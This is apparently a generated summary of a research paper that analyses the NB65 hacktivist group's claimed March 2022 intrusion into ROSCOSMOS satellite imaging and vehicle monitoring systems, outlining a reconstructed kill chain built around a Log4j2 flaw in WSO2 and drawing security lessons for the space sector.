What problem does this paper attempt to address?

### Problems the paper attempts to solve This paper aims to analyze and reveal the technical details of the event in which the hacker group Network Battalion 65 (NB65) claimed to have successfully hacked into the satellite imaging capabilities of the Russian State Space Corporation (ROSCOSMOS) on March 1, 2022. Specifically, the paper attempts to solve the following problems: 1. **Technical vulnerability analysis**: By analyzing the screenshots released by NB65 and other public evidence, identify possible vulnerabilities in the ground and space segments of ROSCOSMOS and the specific methods used by attackers to exploit these vulnerabilities. 2. **Attack process reconstruction**: Construct an estimated Cyber Kill Chain, detailing how NB65 gradually infiltrated and controlled the ROSCOSMOS system, including stages such as reconnaissance, weaponization, delivery, detonation, and malware installation. 3. **Impact assessment**: Evaluate the impact of this attack on ROSCOSMOS and its related systems (such as vehicle monitoring systems), and discuss the significance and lessons of this event for the global aerospace community. 4. **Enhancement of security awareness**: Through case studies, raise awareness of cyber - security threats in the space domain, and in particular, make recommendations for security protection measures for critical infrastructures. ### Summary of specific content - **Background introduction**: The paper first introduces the concept of hacktivism and its development in the modern network environment, especially in the context of the Russia - Ukraine conflict, hacker groups such as NB65 have carried out a series of cyber - attacks on Russian institutions. - **Event overview**: On March 1, 2022, NB65 claimed to have successfully hacked into the satellite imaging capabilities and vehicle monitoring systems of ROSCOSMOS and released multiple screenshots as evidence. However, due to the lack of detailed attack vectors and technical details, media and security bulletins had limited coverage of this event. - **Technical analysis**: - **WSO2 platform**: NB65 deleted the WSO2 platform, which may cause the satellite to be unable to manage functions such as API, authentication, and access control. - **Credential rotation**: NB65 changed the access credentials of VMS, increasing the difficulty for ROSCOSMOS to regain control. - **Server shutdown**: NB65 shut down the server, resulting in data processing and service interruption. - **Log4j2 RCE vulnerability**: The paper points out that the version of WSO2 Enterprise Integrator used by ROSCOSMOS has a Log4j2 RCE vulnerability, which is a key attack point that NB65 may have exploited. - **Cyber Kill Chain example**: - **Reconnaissance**: NB65 obtained network information of ROSCOSMOS through open - source intelligence (OSINT). - **Weaponization**: Developed attack payloads by exploiting the Log4j2 RCE vulnerability. - **Delivery**: Injected malicious code through the Log4j2 logging system. - **Detonation**: Executed remote code to delete WSO2, rotate credentials, and shut down the server. - **Installation**: Installed malware to maintain persistent access. ### Conclusions and significance This paper not only fills the gap in the technical details of this event in the media and security bulletins but also provides valuable insights into understanding the potential threats of hacktivism to the space domain. Through in - depth analysis of this event, researchers can better develop response strategies to protect critical infrastructures from similar cyber - attacks.